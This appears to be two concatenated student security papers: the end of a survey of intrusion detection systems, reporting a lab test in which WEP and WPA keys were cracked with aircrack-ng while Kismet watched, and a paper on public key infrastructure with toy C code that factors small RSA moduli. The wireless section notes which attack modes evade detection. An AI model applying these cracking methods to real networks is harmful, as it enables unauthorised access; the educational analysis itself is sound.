networks with several different password schemes: WEP with a 5-character key, WEP
with a 13-character key, WPA with an 8-character key (common words), and WPA with
an 8-character key (mixed characters).
The IDS host runs Linux Ubuntu 11.10, with the wireless interface card put in
monitor mode, and runs Kismet.
The attacking machine runs Linux Ubuntu 11.10, with aircrack-ng and macchanger
installed.
For WEP cracking, we tried to perform the attack in two modes: passive mode
(where the attacker only captures broadcast packets from the AP and tries to brute
force the key using a statistical method), and active mode (where the attacker
actively sends bogus packets to the AP to force the AP to broadcast more packets,
increasing the speed of finding the key).
It is known that, on average, cracking 64-bit WEP encryption (5-character keys)
requires only about 50,000-200,000 captured data frames. For 128-bit encryption
(13-character keys), the security level is not much better: the attacker only needs to
capture about 200,000-700,000 encrypted data frames to crack the key.
The results of the attack can be summarized as follows:
 For WEP keys:
 Passive attack. The time required to crack the key depends largely on luck.
On our first attempt, it took only about 10 minutes and 5,000 packets to
crack a 5-character key. All subsequent attempts on 5-character and
13-character keys required many more packets, and the run time could take
up to hours. However, the IDS (Kismet) could not detect any problem,
because no suspicious traffic was generated, so it could not raise any alert.
 Active attack. The time required to crack the WEP key is reduced to about
10-15 minutes on average, because a large amount of traffic can be
generated. However, Kismet raised several alerts, including alerts on: an
increase in duplicate IVs, a large number of duplicate frames received, and a
short de-authentication flood.
 For WPA keys: Only a few frames, captured during the connection establishment
between the AP and the client, are required; therefore, only the passive attack type
is needed. After the required frames are captured, a dictionary-based attack is
carried out. The results were actually mixed. When the keys used were common
words, the attack succeeded within a few minutes. However, when the keys used
were complex mixed words, the attacks failed. Besides, since no packets are
generated by the attacker, and the number of frames required to start the attack is
very small (the bulk of the work is the offline brute force attack), Kismet cannot
detect this threat. However, if a strong key is used, it could take a very long time
for the attacker to crack the key, and therefore the WPA encryption scheme is still
relatively secure if handled correctly.
7
Conclusion
From our survey and analysis of these types of IDPS, we can see that each type of
IDPS provides different detection and prevention capabilities; they operate on
different parts of an organization's network, and they have different strengths and
weaknesses in detecting different types of threat. The network-based IDPS is the type
that can monitor and analyze the widest range of the network. It can respond to the
most types of events, and it is often the general backbone of the system. However,
for many specific types of threat, using other types of IDPS is much more effective
and efficient, and sometimes inevitable: a wireless IDPS is much more suitable for
securing the wireless network of the organization; network behavior analysis can
react better against attacks that generate an unusual amount of traffic on the network
(such as a DoS attack, under which the network-based IDPS, overwhelmed by the
number of packets to examine, could perform much worse); and a host-based IDPS is
better at analyzing activity that is transferred through an end-to-end communication
channel (containing encrypted packets that a network-based IDPS cannot examine),
and is therefore much more suitable for protecting important hosts of the network.
Thus, in many systems, especially in big organizations, a robust IDPS solution
needs to incorporate a combination of, or even all of, these different IDPS types.
Sometimes, even different products of the same IDPS type could be used, because
each vendor might use different technologies in their development, which could make
their product more effective against some particular types of threat compared to
others.
If an organization really needs to make use of different IDPSs, it also
needs to consider how to integrate them in some way to achieve higher efficiency; for
example, a network-based IDPS could provide data for a network behavior analysis
system to analyze. In addition, the organization should also include other types of
technology besides IDPS to achieve comprehensive security, such as firewalls,
routers, and even physical barriers or guards. On the other hand, the cost of each of
these IDPS solutions is quite high, especially for small to medium businesses.
Therefore, implementing redundant and extra protection beyond an organization's
needs could also bring many troubles.
There is no hard and fast rule, but each organization should carefully balance
its needs against its budget, so that it can achieve the required security
level at an affordable cost.
8
Bibliography
Charles P. Pfleeger, Shari Lawrence Pfleeger. Security in Computing, Fourth Edition.
Deckerd, G. (2006, November 23). Wireless Attacks from an Intrusion Detection.
Hutchison, K. (2004, October 18). Wireless Intrusion Detection Systems. London.
Karen Scarfone, Peter Mell. (2007, February). Guide to Intrusion Detection and
Prevention Systems (IDPS). Gaithersburg, MD, United States of America: U.S.
Department of Commerce.
Public Key Infrastructure:
An exploration into what Public Key
Infrastructure is, how it’s implemented, and how
the greatest vulnerability of the Public Key
Infrastructure has nothing to do with its keys.
Laurence Putra Franslay
National University of Singapore, School of Computing
Singapore
[email protected]
http://www.geeksphere.net
Abstract. This paper aims to introduce the reader to the concept of
Public Key Infrastructure. It will explore the various types of Public Key
Infrastructures currently in place, as well as how they work. The paper
will then move on to specific infrastructures, and discuss the possible
threats and vulnerabilities to these Infrastructures. The paper will also
explore threats and vulnerabilities that have occurred in the past.
1
Introduction
The Public Key Infrastructure is effectively an arrangement consisting of software,
hardware, people and policies that certifies a public key to be representative of an
identity, which most of the time is either a person or a company. [1]
This whole arrangement then gives an identity to the person issuing
the public key, certifying that he is who he says he is.
2
2.1
Background Knowledge
What exactly is it?
This entire concept of a Public Key Infrastructure is not new. Before computers,
we had these things called passports, which were in a sense the public keys of
those of us going abroad. Locally, we had identification cards. These public
keys (passports and identification cards) were issued by the embassy or the
government, which acted as what we call Certificate Authorities these days.
Hence, as we can see, the entire notion of a Public Key Infrastructure is not
new and has existed within society since before computers. To fully
understand Public Key Infrastructure, and the security behind it, we have to
understand the reasons why it has been around and how it affects our lives, as
well as the existing vulnerabilities found in Public Key Infrastructures that
are not related to computing. After all, these infrastructures have been around
far longer than computers, and hence have experienced more
attempts to circumvent them.
2.2
How does the Public Key Infrastructure work?
From this section onwards, most of the terms used will be those of computer
science, while occasionally drawing on real-world examples.
At the center of every Public Key Infrastructure is a Certificate Authority,
which issues and verifies digital certificates. How these certificates are
generated is very simple and straightforward. First, the owner/server generates
his own public/private key pair, for uses such as encrypting traffic on the
Secure Sockets Layer, as well as identifying the server as the valid server. [2]
After this public/private key pair is generated, the Certificate Authority
takes the public key belonging to the owner/server and signs it. The signing
process is quite straightforward as well. The Certificate Authority takes the
public key of the owner/server, stores it in a file alongside other information
identifying the owner (including, but not limited to, contact information),
computes a digest of that file, and encrypts the digest using its own private
key. The signature, which can then be decrypted using the Certificate
Authority's public key, shows that this certificate was indeed signed by the
Certificate Authority, and that the connection between the server and end user
is somewhat secure.
Figure 1 below is a rough representation of how the Public Key Infrastructure
works.
Fig. 1. The role a Certificate Authority plays in the trust chain.[3]
3
Research
In this paper, the main research done was to measure the rate at which RSA
key pairs can be cracked, and what this means for the future of RSA encryption,
especially in light of the fact that clusters can be activated at a moment's notice
and that distributed computing is now starting to gain popularity once again.
One approach I will be using is to estimate how much it would take to fully
crack a 1024-bit RSA key, in terms of money as well as time and compute power.
In addition, I will also be looking at other possible attack vectors on the
Public Key Infrastructure: how its reliability can be undermined, and how
someone can successfully spoof the identity of another.
3.1
RSA and Public Key Infrastructure
What is RSA? RSA stands for Rivest, Shamir, and Adleman, and is in essence
an algorithm described by the three of them for use in public key cryptography.
It was the first algorithm suitable for both signing and encrypting data, and was
undoubtedly one of the greatest leaps forward in public key cryptography. [4]
RSA is for now believed to be secure enough, given sufficiently long keys in the
range of 1024 bits to 2048 bits, and it is said to be unlikely that people will be
able to crack it in the near future.
How RSA works. In RSA, both the public key and the private key are generated
by the algorithm. The public key is often used to encrypt the data sent over
to the server, in this case data such as the session id of the logged-in user, as well
as other information such as the password that the user sends over when logging
in. The server then uses its private key to decrypt the data.
The keys are generated as follows. First, two large and distinct primes p and q
are chosen at random, of similar bit length (i.e. the same number of bits to
represent both numbers). So, for example, a 1024-bit modulus would require two
512-bit prime numbers.
The modulus is then represented by n, where n = pq, with p and q being
the two prime numbers selected at random earlier. φ(n) is then calculated,
where φ(n) = (p − 1)(q − 1). Afterwards, an integer e is selected such that
it fulfills both conditions 1 < e < φ(n) and gcd(e, φ(n)) = 1. e in this case will
have a short bit length for more efficient encryption, but not so short that
it becomes insecure. This e is then the public key exponent. d, the private
key exponent, is then calculated such that d = e⁻¹ mod φ(n), which is
most of the time computed using the extended Euclidean algorithm.
How does RSA relate to Public Key Infrastructure? In most modern
Public Key Infrastructures, RSA is used to generate the keys for the
encryption/decryption process. For example, when one accesses a website through
HTTPS, most of the time the responses that users return to the server are encrypted
using the public key. In addition, the signatures that Certificate Authorities place
on the certificates that servers use to prove their identity are more often
than not generated using RSA as well. Lastly, when we SSH into servers, their
public key generated using RSA is used to identify the server, as well as to encrypt
the traffic between the server and the client.
3.2
Cracking RSA
Methodology. As described above, an RSA key pair is generated using two
large prime numbers, p and q, and in order to exploit it, one has to first
find these two numbers. The only way to find them is to factorise n. However,
due to the limitations of the C language (no 128/256/512-bit integers), and there
being no straightforward way to do parallel programming in Python, I cracked
8-bit, 16-bit, 32-bit, 48-bit, 52-bit, 56-bit, 60-bit and 64-bit keys, took the
readings, and extrapolated from there.
The experiment was done on a 12-core server with 2.5 GHz per core.
Code to generate prime numbers p and q

#include <stdio.h>
#include <stdlib.h>   /* rand, srand */
#include <time.h>
#include <math.h>

unsigned long long generate(int nbits);
int isPrime(unsigned long long num);
unsigned long long randBits(int nbits);

int main(){
    /*
      due to lack of int128 support in C, and the inherent need for
      parallel computing and that Python support for parallel programming
      is not really there, we have to resort to factorising a maximum of
      64 bits.
    */
    int nbits;
    unsigned long long num1, num2;
    printf("Please enter the number of bits for the final number: ");
    scanf("%d", &nbits);
    num1 = generate(nbits/2);
    num2 = generate(nbits/2);
    printf("Factors: %llu, %llu\n", num1, num2);
    printf("Value: %llu\n", num1 * num2);
    return 0;
}

unsigned long long generate(int nbits){
    unsigned long long num = 4;   /* 4 is composite, so the loop always runs */
    srand(time(NULL));
    while(isPrime(num) == 0){
        num = randBits(nbits);
        srand(rand());
    }
    return num;
}

int isPrime(unsigned long long num){
    int prime = 1;
    unsigned long long root = sqrt(num);
    long long i = 2;
    #pragma omp parallel shared(prime) private(i)
    {
        #pragma omp for schedule(dynamic, 1)
        for(i = 2; i <= root; i++){
            if(num % i == 0){
                prime = 0;
            }
        }
    }
    return prime;
}

unsigned long long randBits(int nbits){
    unsigned long long min = pow(2, nbits - 1);
    unsigned long long max = pow(2, nbits);
    return rand() % (max - min) + min;
}
Code to crack modulus n

#include <stdio.h>
#include <math.h>

unsigned long long findFactor(unsigned long long num);

int main(){
    /*
      due to lack of int128 support in C, and the inherent need for
      parallel computing and that Python support for parallel programming
      is not really there, we have to resort to factorising a maximum of
      64 bits.
    */
    unsigned long long num1, num2, value;
    printf("Please enter the value to crack: ");
    scanf("%llu", &value);
    num1 = findFactor(value);
    num2 = value/num1;
    printf("Factors: %llu, %llu\n", num1, num2);
    printf("Value: %llu\n", value);
    return 0;
}

unsigned long long findFactor(unsigned long long num){
    unsigned long long root = sqrt(num), factor = 0;
    long long i = 2;
    #pragma omp parallel private(i)
    {
        #pragma omp for schedule(dynamic, 1)
        for(i = 2; i <= root; i++){
            if(num % i == 0){
                factor = i;
            }
        }
    }
    return factor;
}
Results. The figures below show the results of the experiment.
Fig. 2. Time taken to crack the various sized keys
Fig. 3. Average time taken to crack the various sized keys
Fig. 4. Time taken to crack the various sized keys
These results show an exponential growth in the time taken to crack the key
as the number of bits grows larger. For example, as the number of bits increased by
4, from 52 bits to 56 bits, there was roughly a four-fold increase in the time taken
to crack the key. The pattern continued from 56 bits to 60 bits and from 60 bits to
64 bits.
The readings for 32 bits and below are ignored, as they are largely similar;
the likely cause of this is the overhead required in multithreaded programming.
Deductions. From the experiment, we can see that there is on average a
four-fold growth in the time taken to crack the key for every increase of the
key length by 4 bits. Taking the data collected, we can see that there is
a y = 1.128 × 10⁻⁶ × 1.3956^x relation between the number of bits and the time
taken to crack the key, where x is the number of bits and y is the time required
in seconds.
Also, from the data obtained, the time taken for the program to run sequentially
is approximately 12 times the time taken to run in parallel. Hence, we can deduce
that the load is distributed roughly equally between all 12 cores in the
experiment. We can therefore assume that if we scale up to more cores, the time
taken to crack the key will divide equally between the cores.
Conclusion for the experiment. Having obtained these results and deductions,
we will now calculate the time required to crack a 1024-bit key using the elastic
compute clusters offered by Amazon Web Services.
For a 1024-bit key, using the equation above, it would require 1.2482 ×
10¹⁴² seconds to finish cracking the key. This works out to 1.4447 ×
10¹³⁷ days on a single 2.5 GHz core.
Assuming that a hacker is willing to spend approximately USD$7,000 a month
to crack the key, he will be able to afford 40 Extra Large High-CPU Compute
Instances [6]. With eight 2.5 GHz virtual cores per compute instance, this would
give the hacker 320 cores to use to crack the key. Even with this impressive
infrastructure behind him, it would still take 1.2369 × 10¹³² years.
Hence, as can be seen from the above results, it is highly unlikely that the
key can be cracked using brute force [5], something which has been agreed upon
by Bruce Schneier, one of the legends of computer security. From his blog, I
quote:
“We’ve never factored a 1024-bit number – at least, not outside any secret government agency – and it’s likely to require a lot more than 15 million computer
years of work. The current factoring record is a 1023-bit number, but it was a
special number that’s easier to factor than a product-of-two-primes number used
in RSA. Breaking that Gpcode key will take a lot more mathematical prowess
than you can reasonably expect to find by asking nicely on the Internet. You’ve
got to understand the current best mathematical and computational optimizations of the Number Field Sieve, and cleverly distribute the parts that can be
distributed. You can’t just post the products and hope for the best.” [5]
3.3
Other Attack Vectors
However, despite the results above, that is not to say that 1024-bit RSA keys
cannot be cracked. In March 2010, a group of researchers managed to break 1024-bit
RSA encryption by meddling with the voltage supplied to the CPU. [7] By
exploiting a trait of the CPU, the researchers were able to slowly piece together
the bits of the private key.
Hence, even if RSA is secure, by compromising other parts of the system, one
can easily remove the security provided by RSA, and with it the whole Public Key
Infrastructure.
Another instance of such an attack that undermined the security of the Public
Key Infrastructure was the Comodo hack in March this year. The hacker did not
attack the key. Instead, the hacker went after the equipment belonging to the
Certificate Authority. By exploiting a variety of loopholes, from 0-day
vulnerabilities to weaknesses in firewalls, the hacker was able to gain access to
the information required to spoof the Certificate Authority. [8]
From these instances, we can see that to exploit the whole Public Key
Infrastructure, one does not need to try to crack the keys. One can instead go
after vulnerabilities in other parts of the system in order to gain access to the
keys, and then spoof the Certificate Authorities or commit other acts.
4
Conclusion
From this paper, we can see that Public Key Infrastructures utilizing RSA are
still very strong, and the keys themselves are not very prone to being attacked,
due to the large amount of resources required. However, at the same time, we can
also see that there are many parts in the mechanism behind the Public Key
Infrastructure, not just the encryption/decryption keys.
In light of the fact that there are so many different parts supporting the
entire Public Key Infrastructure, every aspect of this infrastructure has to be
sturdy in order for it to be fully secure. Hence, in light of recent attacks on
the other parts of this infrastructure, more attention needs to be placed on
these aspects as well, rather than just the public and private keys.
References
1. Jim Brayton, Andrea Finneman, Nathan Turajski, and Scott Wiltsey: SearchSecurity.com, PKI (public key infrastructure), October 2006. http://searchsecurity.techtarget.com/definition/PKI
2. Song Y. Yan: Cryptanalytic Attacks on RSA.
3. isode.com: A Short Tutorial on Distributed PKI. http://www.isode.com/whitepapers/dist-pki-tutorial.html
4. Rivest, R.; Shamir, A.; Adleman, L.: A Method for Obtaining Digital Signatures and Public-Key Cryptosystems (1978). Communications of the ACM 21 (2), 120-126. http://theory.lcs.mit.edu/~rivest/rsapaper.pdf
5. Bruce Schneier: Kaspersky Labs Trying to Crack 1024-bit RSA (June 2008). http://www.schneier.com/blog/archives/2008/06/kaspersky_labs.html
6. Amazon Web Services: Amazon Elastic Compute Cloud (Amazon EC2). https://aws.amazon.com/ec2/#pricing
7. Sean Hollister, Engadget: 1024-bit RSA encryption cracked by carefully starving CPU of electricity (March 2010). http://www.engadget.com/2010/03/09/1024-bit-rsa-encryption-cracked-by-carefully-starving-cpu-of-ele/
8. Peter Bright, Ars Technica: Comodo hacker: I hacked DigiNotar too; other CAs breached (Oct 2011). http://arstechnica.com/security/news/2011/09/comodo-hacker-i-hacked-diginotar-too-other-cas-breached.ars